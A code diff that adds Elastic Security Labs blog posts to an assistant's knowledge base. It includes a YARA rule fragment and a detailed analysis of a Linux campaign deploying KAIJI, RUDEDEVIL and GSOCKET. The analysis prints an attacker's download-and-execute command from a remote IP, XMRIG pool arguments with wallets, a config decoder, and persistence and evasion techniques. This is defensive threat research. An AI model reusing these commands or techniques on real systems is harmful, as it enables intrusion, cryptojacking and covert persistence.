"65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4" + scan_type = "File, Memory" + severity = 100 + +strings: + $a1 = "GetMozillaFromLogins" ascii fullword + $a2 = "AccountConfiguration+username" wide fullword + $a3 = "MailAccountConfiguration" ascii fullword + $a4 = "KillTorProcess" ascii fullword + $a5 = "SmtpAccountConfiguration" ascii fullword + $a6 = "GetMozillaFromSQLite" ascii fullword +``` diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/automating_security_protections_rapid_response_to_malware.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/automating_security_protections_rapid_response_to_malware.md new 
file mode 100644 index 0000000000000..d26fbf2371e05 --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/automating_security_protections_rapid_response_to_malware.md @@ -0,0 +1,48 @@ +--- +title: "Automating the Security Protections rapid response to malware" +slug: "automating-security-protections-rapid-response-to-malware" +date: "2023-03-01" +description: "See how we’ve been improving the processes that allow us to make updates quickly in response to new information and propagate those protections to our users, with the help of machine learning models." +author: + - slug: samantha-zeitlin +image: "blog-security-endpoint-720x420.png" +category: + - slug: machine-learning + - slug: detection-science +--- + +Cyber attacks on corporate networks were [up 50% in 2021](https://www.forbes.com/sites/chuckbrooks/2022/01/21/cybersecurity-in-2022--a-fresh-look-at-some-very-alarming-stats/?sh=675676ea6b61), and it’s [expected that 2022 will see more of the same](https://www.govtech.com/blogs/lohrmann-on-cybersecurity/the-top-22-security-predictions-for-2022). [Elastic Endpoint Security](https://www.elastic.co/endpoint-security/) includes a variety of protection layers to ensure maximum coverage against different types of malware. There have been a few examples recently of the need for [fast, accurate updates](https://www.elastic.co/blog/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper) of user environments in order to protect against the latest malware. Here at Elastic, we’ve been improving the processes that allow us to make updates quickly in response to new information and propagate those protections to our users. + +As part of our security solution, we use a machine learning model to help us detect malware based on known characteristics. Since machine learning is never perfect, we deploy supplemental artifacts, including lists of known file hashes that range from malicious to benign. There are two scenarios when we might need to update these lists, which we’ll cover here. Using these, teams can experience a much faster response to malware. + +[Related article: [Sandboxing anti-malware products for fun and profit](https://www.elastic.co/blog/sandboxing-anti-malware-products-for-fun-and-profit)] + +## Scenario 1: The model isn’t perfect + +This happens pretty rarely, since our model has True Negative rates of 99.8%. But no model is perfect, and our True Positive rates vary from 99% (which is great) down to 97.9%, due to noisy data — particularly large bursts of near-duplicates. In applying machine learning to cybersecurity, data drift is an ever-present challenge and part of what makes it such an interesting problem. + +There are a couple of ways we can find out if our model is doing the wrong thing: + +1. **User feedback.** + +A user sends us an email telling us that a piece of custom software is being flagged as malware, but is actually safe. + +2. **Telemetry data coming back from our model running on customers’ machines.** + +We look at the volume and velocity of alerts, using Elastic’s Anomaly Detection feature to let us know if there is a sudden spike from a particular file. We also use patterns to help us confirm if an alert is coming from a single noisy machine, a test cluster, or a legitimate threat. + +The advantage of using lists as a backstop to machine learning is that it’s a fast and easy way to make sure our customers are protected from new malware, as well as protecting them from unnecessary noise from false positives. 
+ +## Scenario 2: New forms of malware appear + +We typically find out about new kinds of malware from either security news/community resources, or our own Security Intelligence and Analytics team identifying new kinds of malware. + +When this happens, we can easily deploy small changes to lists. We update the model separately, because that takes longer. + +We’ve been steadily adding more automation to make this process of deploying updated lists to customers smoother and faster, with the goal of making it easy for anyone on the team to create and deploy an update. We’ve also been working on making the process of updating the model easier and faster. + +## Threats yet discovered… + +The Elastic Security Intelligence and Analytics team continues to research and respond to groundbreaking threats in its mission to help Elastic customers and the broader security community. If you’re using [Elastic Security](https://www.elastic.co/security?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=elastic+security) already, you can expect to see our latest findings in the newsfeed within the platform. We’ll also post our latest findings on [elastic.co/blog](https://www.elastic.co/blog). + +Ready to become part of the Elastic Security community and take advantage of the team’s leading threat research? Get started with a free [14-day trial of Elastic Cloud](https://cloud.elastic.co/registration?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=trail) or [download](https://www.elastic.co/downloads/?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=download) the self-managed version of the Elastic Stack for free. diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/behind_the_scenes_global_threat_report.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/behind_the_scenes_global_threat_report.md new file mode 100644 index 0000000000000..7a58953fb218a --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/behind_the_scenes_global_threat_report.md @@ -0,0 +1,45 @@ +--- +title: "Behind the scenes: The making of a Global Threat Report" +slug: "behind-the-scenes-global-threat-report" +date: "2022-11-30" +description: "What was our approach and process for creating a global threat report?" +author: + - slug: mark-dufresne +image: "gtr-blog-image-720x420.jpg" +category: + - slug: reports +--- + +The first [Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) was published earlier this week. In it, you will learn about trends observed by our threat researchers, our predictions for what’s coming next, and some of our recommendations to operate securely in the face of today’s and tomorrow’s threats. If you haven’t read it yet, go [check it out](https://www.elastic.co/explore/security-without-limits/global-threat-report). + +As a technical leader in [Elastic Security](http://www.elastic.co/security), I'd like to reveal a small amount about what goes into reports like this one and why it’s significant. + +## Why did we do it? + +If you didn’t already know this, you know it now: Elastic is a security company. We are also different — we’re open and transparent. 
We share exactly how our detections and preventions work in the [protections-artifacts](https://github.com/elastic/protections-artifacts) and [detection-rules](https://github.com/elastic/detection-rules) repos. We’ve launched [Elastic Security Labs](https://www.elastic.co/security-labs/) and regularly publish our research, discoveries, and tools. Anyone can spin up a [trial](https://cloud.elastic.co/registration) and try all our features — no barriers, no sales BS. This report is another way we’re bringing transparency to you. We want to empower you by sharing what we know and what we think is coming, and we will continue to expand the scope of what we share in the coming months. + +## How'd we do it? + +Put simply, by analyzing a vast amount of data. Behind [Elastic Security Labs](http://www.elastic.co/security-labs) is a large team of malware and intelligence analysts, security engineers, researchers, data scientists, and other experts. This team builds and maintains all the protection features in Elastic’s security products: blocking malware, in-memory threats, ransomware, and other malicious behaviors. You name it, we do it. To do this effectively, we need visibility into how our features perform and what threats they’re coming in contact with. We get that visibility through anonymous telemetry shared with us by our users (as well as through research our team carries out on threat feeds and other public datasets). + +Our researchers are in the telemetry data daily. Usually, we are focused on the performance of particular features, eliminating false positives and adding protection against emergent techniques, some of which you can learn about in our [threat report](https://www.elastic.co/explore/security-without-limits/global-threat-report). This battle never ends, and we don’t anticipate that changing any time soon. + +## Why now? + +As our user base rapidly grew over the past year, we came to the conclusion that we now observe a significant percentage of all threats. Upon hitting that critical mass, we decided to peel off some of our best researchers to zoom out, analyze the totality of what we’ve seen, and determine if we had a story worth sharing. We felt we probably had something to contribute to the community’s collective understanding of the threat landscape, and as you read the report, we hope you agree that we were right to think that. + +## Diving deeper + +With that backdrop, I can share a bit more about how a report like this comes to be. Under the leadership of [Devon Kerr](https://twitter.com/_devonkerr_), we built an eight-week plan to analyze and summarize the telemetry coming in from our various features. All our event telemetry data lives in Elasticsearch, which makes for straightforward summarization and visualization. + +Data normalization was a significant challenge. This included filtering out excessively noisy endpoints so results aren’t skewed, ignoring data from test clusters, ignoring alerts for data which we later realized were false positives, pulling together signals from our full [Elastic Security](http://www.elastic.co/security) solution, and more. It wasn’t the most glamorous work in the world, but it was foundational to producing meaningful results at the end. We’ll plan for a couple weeks in this phase again next time — it will always be a significant lift. 
+ +Once the data was in good shape, we extracted the meaning from raw aggregations of a massive number of events to determine insights worth sharing, which help us understand the present state of the threat landscape. In particular, we wanted to explain the most prevalent threats we're seeing and put them in context. These are patterns that ebb and flow throughout the year, making an annual overview particularly useful for spotting the threats making the biggest impact. This led to the various charts and statistics laid out in the report. It took us a couple weeks to settle on a list among the team. + +Next, we had to write. Devon, [Andy Pease](https://twitter.com/andythevariable), [Daniel Stepanic](https://twitter.com/DanielStepanic), and [Terrance DeJesus](https://twitter.com/_xDeJesus) did the heavy lifting here. Anyone who’s done technical writing knows how important clarity and conciseness are in delivering a message that can be understood by the general public. A few dozen pages came together in a way we’re proud of. Importantly, we partnered closely with [Dhrumil Patel](https://www.linkedin.com/in/pateldhrumil/), our product management lead, and [Jen Ellard,](https://twitter.com/jellard8) security product marketing lead, for the [Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) effort to make sure our points were clear and meaningful to our user base. + +All of that brought us to the end of our eight week plan to develop the report. By late August, we were largely pencils-down on the content but far from done. We’re lucky to have a team of designers at Elastic to help us transform a wall of text in a Google doc into a PDF with style and graphics to enhance meaning and help our conclusions and recommendations jump off the page. We knew that this process would take time, many drafts, and a lot of back and forth. Planning and executing this piece of the project took about as long as the data gathering, analysis, and writing. We learned a lot about how long it takes to go from completed draft to final copy and will involve our internal partners early and often in the process. + +## Tell us what you think + +We’d love to hear your feedback about the first [Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report). More is on the way. We expect to make this an annual publication, and between now and then we’re hoping to deliver a more interactive version of this inaugural report. diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/betting_on_bots.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/betting_on_bots.md new file mode 100644 index 0000000000000..8c52dd6765046 --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/betting_on_bots.md @@ -0,0 +1,827 @@ +--- +title: "Betting on Bots: Investigating Linux malware, crypto mining, and gambling API abuse" +slug: "betting-on-bots" +date: "2024-09-27" +description: "The REF6138 campaign involved cryptomining, DDoS attacks, and potential money laundering via gambling APIs, highlighting the attackers' use of evolving malware and stealthy communication channels." 
+author: + - slug: remco-sprooten + - slug: ruben-groenewoud +image: "betting-on-bots.jpg" +category: + - slug: malware-analysis + - slug: attack-pattern +tags: + - linux + - kaiji + - rudedevil + - gsocket + - cryptomining +--- + +## Introduction + +In recent months, Elastic Security Labs has uncovered a sophisticated Linux malware campaign targeting vulnerable servers. The attackers initiated the compromise in March 2024 by exploiting an Apache2 web server. Gaining initial access the threat actors deployed a complex intrusion set to establish persistence and expand their control over the compromised host. + +The threat actors utilized a mixture of tools and malware, including C2 channels disguised as kernel processes, telegram bots for communication, and cron jobs for scheduled task execution. Notably, they deployed multiple malware families, such as KAIJI and RUDEDEVIL, alongside custom-written malware. KAIJI, known for its DDoS capabilities, and RUDEDEVIL, a cryptocurrency miner, were used to exploit system resources for malicious purposes. + +Our investigation revealed a potential Bitcoin/XMR mining scheme that leverages gambling APIs, suggesting the attackers might be conducting money laundering activities using compromised hosts. We also gained access to a file share that hosted daily uploads of fresh KAIJI samples with previously unseen hashes, indicating active development and adaptation by the malware authors. + +This research publication delves into the details of the campaign, providing a comprehensive analysis of the attackers' tactics, techniques, and procedures. We explore how they established initial access, the methods used for persistence and privilege escalation, and the malware deployed at each stage. Additionally, we discuss the command and control infrastructure, including the use of GSOCKET and Telegram for stealthy communication. + +## Execution flow + +### Initial access + +Our team observed a host that was initially compromised in March 2024 by obtaining arbitrary code execution on a server running Apache2. Evidence of this compromise is seen in the execution of the `id` command via the Apache2 process, after which we see the threat actor exploiting the web server and deploying KAIJI malware under the `www-data` user account. + +Shortly after the Kaiji deployment, the attacker used the `www-data` account to download a script named `00.sh` from the URL `http://61.160.194[.]160:35130`, which, after further investigation, also hosted several versions of RUDEDEVIL malware. + +`00.sh` is a stager that: + +* Sets its default shell and PATH. +* Deletes several log files to erase traces of execution. +* Leverages `ps`, `netstat`, `lsof` and a list of common mining process names to kill any potential mining competition on the compromised host. +* Flushes the `iptables` rules on the host, sets several `iptables` rules to block connections to specific destination ports and mining pools, and disables `iptables`. +* Finally, a second stage (`sss6`/`sss68`) is downloaded and executed, and execution traces are erased. + +The figure below shows a compressed version of the stager. Lines annotated with `[...]` are shortened to enhance readability. 
+ +![Compressed version of the 00.sh stager](/assets/images/betting-on-bots/image5.png "Compressed version of the 00.sh stager") + +### Fileserver + +Via the backdoored web server process, the attacker downloaded and executed malware through the following command: + +``` +sh -c wget http://107.178.101[.]245:5488/l64;chmod 777 l64;./l64;rm -r l64;wget http://107.178.101[.]245:5488/l86;chmod 777 l86;./l86;rm -r l86 +``` + +The `l64` and `l86` files are downloaded from `http://107.178.101[.]245:5488`, after which they are granted all permissions, executed, and removed. Looking at the server that is hosting these malware samples, we see the following: + +![Rejetto File Server Hosting Several Pieces of Malware](/assets/images/betting-on-bots/image30.png "Rejetto File Server Hosting Several Pieces of Malware") + +This seems to be a file server, hosting several types of malware for different architectures. The file server leverages the Rejetto technology. These malwares have upload dates and download counters. For example, the `download.sh` file that was uploaded September 10th, was already downloaded 3,100 times. + +![Download Counter Indicating 3000+ Downloads Within 2 Weeks of Upload](/assets/images/betting-on-bots/image25.png "Download Counter Indicating 3000+ Downloads Within 2 Weeks of Upload") + +### RUDEDEVIL/LUCIFER + +Upon closer inspection, the file `sss6`, which was downloaded and executed, has been identified as the RUDEDEVIL malware. Early in the execution process, we encounter an embedded message characteristic of this malware family: + +![RUDEDEVIL Malware Characteristic](/assets/images/betting-on-bots/image11.png "RUDEDEVIL Malware Characteristic") + +``` +Hi, man. I\'ve seen several organizations report my Trojan recently, +Please let me go. I want to buy a car. That\'s all. I don\'t want to hurt others. +I can\'t help it. My family is very poor. In China, it\'s hard to buy a suite. +I don\'t have any accommodation. I don\'t want to do anything illegal. +Really, really, interested, you can give me XmR, my address is 42cjpfp1jJ6pxv4cbjxbbrmhp9yuzsxh6v5kevp7xzngklnutnzqvu9bhxsqbemstvdwymnsysietq5vubezyfoq4ft4ptc, +thank yo +``` + +We note that the files `l64` and `l86` that are hosted on the file server contain the same malware. When analyzing the execution flow of the malware we see that the main function of the malware performs several key tasks: + +* **Daemon Initialization:** The process is converted into a daemon using `daemon(1, 0)`. +* **Socket Creation:** A socket is created and bound to a specific port. +* **Signal Handling:** Custom signal handlers are set up for various signals. +* **Service Initialization:** Several services are started using `SetFILE`. +* **Privilege Handling:** It checks for root privileges and adjusts resource limits accordingly. +* **Decryption:** The malware decrypts its configuration blobs. +* **Thread Creation:** Multiple threads are spawned for tasks like mining, killing processes, and monitoring network and CPU usage. +* **Main Loop:** The program enters an infinite loop where it repeatedly connects to a server and sleeps for a specified duration. 
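+
+To summarize the loop structure described above, here is a minimal Python sketch of the equivalent logic (the malware itself is native code; the entries in `sb_name` below are hypothetical placeholders, and `get_pid_by_name` stands in for the decompiled `getPidByName` helper):
+
+``` python
+import os
+import signal
+import subprocess
+import time
+
+# Hypothetical placeholders; the real sb_name array holds the names of the
+# competing processes RUDEDEVIL wants to terminate.
+sb_name = ["xmrig", "minerd", "kinsing"]
+
+def get_pid_by_name(name):
+    """Return the PIDs of processes matching name (stand-in for getPidByName)."""
+    try:
+        output = subprocess.check_output(["pidof", name], text=True)
+        return [int(pid) for pid in output.split()]
+    except subprocess.CalledProcessError:
+        return []
+
+def kill_pid_loop():
+    """Sketch of the KillPid thread: walk sb_name with a 2-second pause per
+    entry, then sleep 600 seconds after a full pass."""
+    while True:
+        for name in sb_name:
+            for pid in get_pid_by_name(name):
+                try:
+                    os.kill(pid, signal.SIGKILL)
+                except OSError:
+                    pass
+            time.sleep(2)
+        time.sleep(600)
+```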
+ +When examining the encryption routine, we find it utilizes XOR-based encoding: + +![DareDevil Encryption Routine](/assets/images/betting-on-bots/image13.png "DareDevil Encryption Routine") + +To decode the contents statically, we developed a basic Python snippet: + +``` python +def DecryptData(data_block, encryption_key): + key_modifier = encryption_key & 0xFF + key_index = key_modifier // 0x5F # 0x5F = 95 in decimal + modifier = (key_modifier - (key_index * 0x5F)) + 0x58 # 0x58 = 88 in decimal + + for i in range(len(data_block)): + data_block[i] ^= modifier + data_block[i] &= 0xFF # Ensure 8-bit value + data_block[i] += modifier + data_block[i] &= 0xFF # Ensure 8-bit value + + return data_block + +# Encoded data as hex strings +encoded_data = [ + '4c494356515049490c467978', + '0d4f1e4342405142454d0b42534e380f0f5145424f0c53034e4f4f4a0c4f40573801393939391e0d451e020141303727222026254f252d372643400706314955032a593330233237587951215553552d464c0101414939514401515258414324273340254756564741404207004122782d50475555412d503106394d4c34554e48513926352054362a1e0d4e1e20', + '0f424d4e0f435536575649484b', + '5642424e380f0f5654430c42014a494c45460c534f4d38070602050f435352434356544b', +] + +encryption_key = 0x03FF # 1023 in decimal + +# Process and decrypt each encoded data string +for data in encoded_data: + # Convert hex string to list of integers + data_bytes = bytes.fromhex(data) + data_block = list(data_bytes) + + # Decrypt the data + decrypted_block = DecryptData(data_block, encryption_key) + + # Convert decrypted data back to bytes + decrypted_bytes = bytes(decrypted_block) + print("Decrypted text:", decrypted_bytes.decode('utf-8', errors='ignore')) +``` + +After decoding the configuration, the following values are revealed: + +* The first value C2 domain `nishabii[.]xyz`. +* The second value reveals options that will be passed to XMRIG. +* The third value shows the temp file location the malware uses. +* The fourth and last string shows the download location for the XMRIG binary. + +### Thread Management in the Malware + +The malware initiates several threads to handle its core operations. Let’s explore how some of these functions work in detail. + +#### Understanding the KillPid Function + +One of the threads runs the KillPid function, which is designed to continuously monitor and manage processes. The function begins by detaching its current thread, allowing it to run in the background without blocking other processes. It then enters an infinite loop, repeatedly executing its tasks. + +At the heart of its functionality is an array called `sb_name`, which contains the names of processes the malware wants to terminate. + +![RUDEDEVIL kill process array](/assets/images/betting-on-bots/image24.png "RUDEDEVIL kill process array") + +Every two seconds, the function checks the system for processes listed in this array, retrieving their process IDs (PIDs) using a helper function called `getPidByName`. After each iteration, it moves to the next process in the list, ensuring all processes in `sb_name` are handled. + +Interestingly, after processing all elements in the array, the function enters an extended sleep for 600 seconds — roughly 10 minutes — before resuming its process checks. This extended sleep period is likely implemented to conserve system resources, ensuring the malware doesn't consume too much CPU time while monitoring processes. 
+ +#### Understanding the Get_Net_Messages Function + +Another crucial thread is responsible for monitoring network traffic, specifically focusing on the `eth0` network interface. This functionality is handled by the `getOutRates` function. The function begins by setting up necessary variables and opening the `/proc/net/dev` file, which contains detailed network statistics for each interface. + +![Getting network rates from /proc/net/dev](/assets/images/betting-on-bots/image22.png "Getting network rates from /proc/net/dev") + +If the file is successfully opened, the malware reads a block of data — up to 1024 bytes — and processes it to extract the relevant network statistics. It specifically looks for the `eth0` interface, parsing the output rate data using a standard string parsing method. If successful, the function returns the output rate for `eth0`; otherwise, it returns `0`, ensuring the malware continues functioning even if an error occurs. + +This routine allows the malware to quietly monitor the network activity of the infected machine, likely to track data being sent or received across the interface. + +#### Understanding the Get_Cpu_Message Function + +For CPU monitoring, the malware uses the `GetCpuRates` function. This function continuously monitors the CPU usage by reading data from `/proc/stat`. Similar to how the network data is handled, the CPU statistics are read and parsed, allowing the malware to calculate the system's CPU usage. + +![Getting CPU information from /proc/stat](/assets/images/betting-on-bots/image34.png "Getting CPU information from /proc/stat") + +The function operates in an infinite loop, sleeping for one second between each iteration to avoid overwhelming the system. If the file cannot be opened for some reason, the function logs an error and gracefully exits. However, as long as it’s able to read the file, it continually monitors CPU usage, ensuring the malware remains aware of system performance. + +#### Understanding the Send_Host_Message Function + +Perhaps the most critical thread is the one responsible for sending system information back to the malware operators. The `_SendInfo` function performs this task by collecting data about the infected system’s CPU and network usage. It begins by setting up buffers and preparing file paths to gather the necessary data. Depending on the system’s status, it formats the CPU and network usage into a string. + +![Sending system info back to the C2](/assets/images/betting-on-bots/image19.png "Sending system info back to the C2") + +Additionally, the function checks whether a particular process is running on the system and adjusts its formatted message accordingly. Finally, it sends this formatted data back to the command-and-control server via a socket connection. + +In essence, this function allows the malware to remotely monitor the infected machine, gathering key details like CPU load and network activity. The operators can use this information to assess the status of their infection and adjust their activities as needed. + +### Connecting to the Command-and-Control (C2) Server + +Once all the threads are up and running, the malware shifts its focus to establishing a connection with its C2 server. This is managed by the `ConnectServer` function in the main thread, which handles communication with the server and executes commands remotely. 
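+
+As a side note before digging into `ConnectServer`, the monitoring threads described in the previous section amount to periodically parsing two procfs files. The snippet below is a rough, illustrative Python equivalent of that logic; the function names are ours and the parsing is simplified compared to the native implementation:
+
+``` python
+def get_out_rate(interface="eth0"):
+    """Approximation of getOutRates: read the transmit byte counter for eth0."""
+    try:
+        with open("/proc/net/dev") as f:
+            for line in f:
+                if line.strip().startswith(interface + ":"):
+                    fields = line.split(":", 1)[1].split()
+                    return int(fields[8])  # ninth field: bytes transmitted
+    except OSError:
+        pass
+    return 0  # mirror the malware's fallback of returning 0 on error
+
+def get_cpu_usage():
+    """Approximation of GetCpuRates: read aggregate CPU counters from /proc/stat."""
+    with open("/proc/stat") as f:
+        values = [int(v) for v in f.readline().split()[1:]]
+    idle, total = values[3], sum(values)
+    return 100.0 * (total - idle) / total
+```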
+ +#### Understanding the ConnectServer Function + +The first task the `ConnectServer` function performs is establishing a connection to the C2 server using `ServerConnectCli`. After successfully connecting, the malware configures the socket to enable keep-alive settings, ensuring that the connection remains stable over extended periods of time. + +Once the connection is set up, the malware collects various pieces of system information, including the hostname, user information, CPU specs, and memory details. This information is then sent to the server as an initial data payload, providing the attackers with a detailed view of the infected machine. + +After this initial setup, the malware enters an ongoing loop where it awaits and processes commands from the server. The types of commands handled are varied and can include tasks like launching a DDoS attack, stopping or starting CPU-intensive operations, executing system commands, or managing cryptocurrency mining activities. The loop continues indefinitely, ensuring that the malware is ready to execute any command sent by its operators. + +When the connection is no longer needed, or when the malware receives a termination command, it gracefully closes the socket, ending the session with the server. + +#### Command-and-Control (C2) Commands + +The `ConnectServer` function processes a variety of commands from the C2 server, each designed to control a different aspect of the infected system. Here’s a breakdown of the commands handled by the malware: + +* **Case 4:** The malware calls the `DealwithDDoS` function, likely initiating a Distributed Denial of Service (DDoS) attack. +* **Case 5:** Sets the `StopFlag` to `1`, which could signal the malware to stop specific tasks. +* **Case 6:** Downloads a file from the server using `http_get`, changes its permissions, and then executes it. This command allows the attackers to run additional malware or scripts on the infected machine. +* **Case 7:** Executes a system command using the `system` function, providing the attackers with direct control over the system’s command line. +* **Case 8:** Sets `StopCpu` to `0`, restarting any previously halted CPU tasks. +* **Case 9:** Sets `StopCpu` to `1`, halting all CPU tasks. +* **Case 0xA:** Updates the CPU mining configuration with new data and retrieves the PID of the current process, allowing the malware to modify its cryptocurrency mining operations. +* **Case 0xB:** Sets `stopxmr` to `1`, effectively stopping the XMRIG miner. +* **Case 0xC:** Resets `stopxmr` to `0` and retrieves the current process PID, resuming the mining activity. + +![Processing of C2 commands](/assets/images/betting-on-bots/image19.png "Processing of C2 commands") + +Each command gives the malware operators precise control over how the infected machine behaves, whether it’s participating in a DDoS attack, running new malware, or managing mining operations. + +### Variants of RUDEDEVIL Malware and XMRIG Configuration + +While the file server mentioned before was active, we observed multiple versions of the RUDEDEVIL malware being uploaded. The core functionality of these versions remained largely the same, with the only significant variation being the embedded XMRIG commands used for cryptocurrency mining. 
+
+Each version of the malware was configured to connect to the same mining pool, `c3pool.org`, but with slight differences in the parameters passed to the XMRIG miner:
+
+* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p R`
+* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p 2`
+* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p php`
+* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p 0`
+
+Each of these commands directs the miner to connect to the same mining pool but specifies different wallets or configurations. By examining the `c3pool` application, we confirmed that both XMR addresses associated with these commands are currently active and mining.
+
+![C3pool mining revenue](/assets/images/betting-on-bots/image9.png "C3pool mining revenue")
+
+Additionally, through this analysis, we were able to estimate the total profit generated by these two mining campaigns, highlighting the financial impact of the RUDEDEVIL malware and its connection to illegal cryptocurrency mining operations.
+
+## GSOCKET
+
+To establish persistence, the threat actor downloaded and installed [GSOCKET](https://github.com/hackerschoice/gsocket), a network utility designed to enable encrypted communication between machines that are behind firewalls or NAT. GSOCKET creates secure, persistent connections through the Global Socket Relay Network (GSRN). This open-source tool includes features like AES-256 encryption, support for end-to-end communication security, and compatibility with SSH, netcat, and TOR, which allow for encrypted file transfers, remote command execution, and even the creation of hidden services.
+
+Although GSOCKET is not inherently malicious, its features can be leveraged for suspicious purposes.
+
+Once deployed, GSOCKET performs several actions to maintain persistence and conceal its presence. First, it checks the system for active kernel processes to decide which process it will masquerade as:
+
+![GSOCKET Kernel Process Masquerading](/assets/images/betting-on-bots/image7.png "GSOCKET Kernel Process Masquerading")
+
+It then creates the `/dev/shm/.gs-1000` directory to download and store its binary in shared memory. Additionally, by default, it sets up an `htop` directory at `/home/user/.config/htop/` to store both the GSOCKET binary and the secret key used for its operations.
+
+Next, a cron job is set up that runs the GSOCKET binary with the secret key every minute.
+
+![GSOCKET Crontab Persistence](/assets/images/betting-on-bots/image21.png "GSOCKET Crontab Persistence")
+
+The binary is executed under the name of a kernel process using the `exec -a [process_name]` command, further enhancing the ability to evade detection.
The cron job includes a base64 encoded command that, when decoded, ensures the persistence mechanism is regularly executed and disguised as a legitimate kernel process:
+
+When decoding the payload, we see how the `defunct.dat` secret key is used as an argument to execute the `defunct` binary, which is masqueraded as `[raid5wq]` through the use of the `exec -a` command:
+
+In addition to using cron jobs, GSOCKET has the capability to establish persistence through shell profile modification, run control (`rc.local`) and Systemd. GSOCKET enumerates potential persistence locations:
+
+![GSOCKET Persistence Technique Enumeration](/assets/images/betting-on-bots/image29.png "GSOCKET Persistence Technique Enumeration")
+
+GSOCKET supports multiple webhooks, such as Telegram or Discord integrations, enabling remote control and notifications:
+
+![GSOCKET Webhook Capabilities](/assets/images/betting-on-bots/image14.png "GSOCKET Webhook Capabilities")
+
+Finally, after installation, GSOCKET ensures that all files it creates or modifies are timestomped in an attempt to erase any trace of the installation:
+
+![GSOCKET Timestomping Capability](/assets/images/betting-on-bots/image16.png "GSOCKET Timestomping Capability")
+
+These features make GSOCKET an attractive tool for threat actors seeking stealth and persistence. In this campaign, GSOCKET was exploited to establish covert channels back to C2 servers while attempting to evade detection.
+
+Additionally, a PHP payload was fetched from an external IP and saved as `404.php`, likely functioning as a backdoor for future access. We did not manage to obtain this payload.
+
+### Post compromise dwell time
+
+After a three-week period with no noticeable activity, the threat actors resumed operations, using the system's built-in Python3 to establish a reverse connection to a new command-and-control server.
+
+After regaining access to the host, a newer version of the KAIJI malware was deployed.
+
+### KAIJI malware: a comparison to previous samples
+
+While investigating the files on the discovered file server, we saw a shell script. This script appears to be the main downloader fetched by an earlier stage, ensuring that the correct binary for the victim's architecture is used.
+
+![KAIJI Download.sh Script](/assets/images/betting-on-bots/image2.png "KAIJI Download.sh Script")
+
+The same shell script appears in other reports where it is used to deploy KAIJI.
+
+As part of our investigation, we analyzed the KAIJI malware samples found on the file server and compared them with samples identified by Black Lotus Labs in 2022. Their detailed analysis of `Chaos` (KAIJI) can be found in their blog post [here](https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/).
+
+Using [BinDiff](https://github.com/google/bindiff), a binary comparison tool, we compared the functions in the binaries. The analysis revealed that the code in our sample was identical to the previously identified KAIJI sample from 2022.
+
+![Bindiff for Old and New Version of KAIJI](/assets/images/betting-on-bots/image18.png "Bindiff for Old and New Version of KAIJI")
+
+Although the code was the same, one critical difference stood out: the C2 server address. While the functionality remained consistent in both binaries, they pointed to different C2 domains.
+
+Delving deeper into the disassembly, we identified a function named `main_Link`. This function is responsible for decoding the C2 server address used by the malware.
+
+![KAIJI main_link Function](/assets/images/betting-on-bots/image31.png "KAIJI main_link Function")
+
+After decoding, the function searches for the `|(odk)/*-` postfix in the address and removes it, leaving only the C2 domain and port. This process ensures the malware can communicate with its C2 server, though the address it contacts may change between samples.
+
+Given that some resources have been published that statically reverse engineer KAIJI, we will instead take a more detailed look at its behaviors.
+
+![KAIJI Dynamic Analysis - Part 1](/assets/images/betting-on-bots/image12.png "KAIJI Dynamic Analysis - Part 1")
+
+After execution, KAIJI creates several files in the `/etc/` and `/dev/` directories: `/etc/id.services.conf`, `/etc/32678`, `/dev/.img` and `/dev/.old`. These files are placed to establish persistence.
+
+Two services are set up: `/etc/init.d/linux_kill` and `crond.service`. `crond.service` is executed by Systemd, while `linux_kill` is used for SysVinit persistence.
+
+After reloading the Systemd daemon, the first network connection to the C2 is attempted.
+
+![KAIJI Dynamic Analysis - Part 2](/assets/images/betting-on-bots/image18.png "KAIJI Dynamic Analysis - Part 2")
+
+Next, the `Systemd Late generator` service file is created. More information on the workings of `Systemd` and the different ways of establishing persistence through it can be found in our recent blog series dubbed [Linux Detection Engineering - A primer on persistence mechanisms](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms).
+
+KAIJI creates the `/boot/System.img.config` file, which is an executable that is executed through the previously deployed `Systemd` services. This binary is, among other artifacts, another means of establishing persistence.
+
+![KAIJI Dynamic Analysis - Part 3](/assets/images/betting-on-bots/image26.png "KAIJI Dynamic Analysis - Part 3")
+
